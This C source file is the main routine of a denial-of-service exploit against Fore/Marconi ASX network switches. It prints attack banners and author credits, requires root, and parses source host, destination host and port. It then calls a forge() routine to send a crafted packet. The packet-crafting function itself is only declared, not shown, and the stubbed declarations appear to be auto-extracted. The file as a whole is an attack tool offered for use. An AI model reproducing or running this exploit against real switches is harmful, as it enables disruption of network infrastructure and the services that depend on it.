
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 unsigned short atoi (int ) ;
 int exit (int ) ;
 int forge (unsigned int,unsigned int,unsigned short) ;
 int getopt (int,char**,char*) ;
 scalar_t__ getuid () ;
 unsigned int host_convert (int ) ;
 int optarg ;
 int printf (char*) ;
 int strncpy (char*,int ,int) ;
 int usage (char*) ;

main (int argc, char **argv)
{
 unsigned int source_host = 0, dest_host = 0;
 unsigned short source_port = 0, dest_port = 80;
 int input;
 char desthost[16], srchost[16];

 printf ("\nDenial of Service attack for Fore/Marconi ASX Switches\n");
 printf
  ("Found by Keith Pachulski <keithp@corp.ptd.net>\nExploit written by J.K. Garvey <jim@trig.org>\n");

 if (getuid () != 0)
 {
  printf
   ("\nRoot is required. Duh.\n");
  exit (0);
 }

 if (argc < 5)
 {
  usage (argv[0]);
  exit (0);
 }

        while ((input = getopt (argc, argv, "s:d:p:")) != -1)
 {
  switch (input)
  {
   case 's':
    source_host = host_convert (optarg);
    strncpy (srchost, optarg, 16);
   break;

   case 'd':
    dest_host = host_convert (optarg);
    strncpy (desthost, optarg, 16);
   break;

   case 'p':
    dest_port = atoi(optarg);
   break;
  }
 }

 forge (source_host, dest_host, dest_port);
 printf ("\nCrafted packet sent!\n");

 exit (0);
}
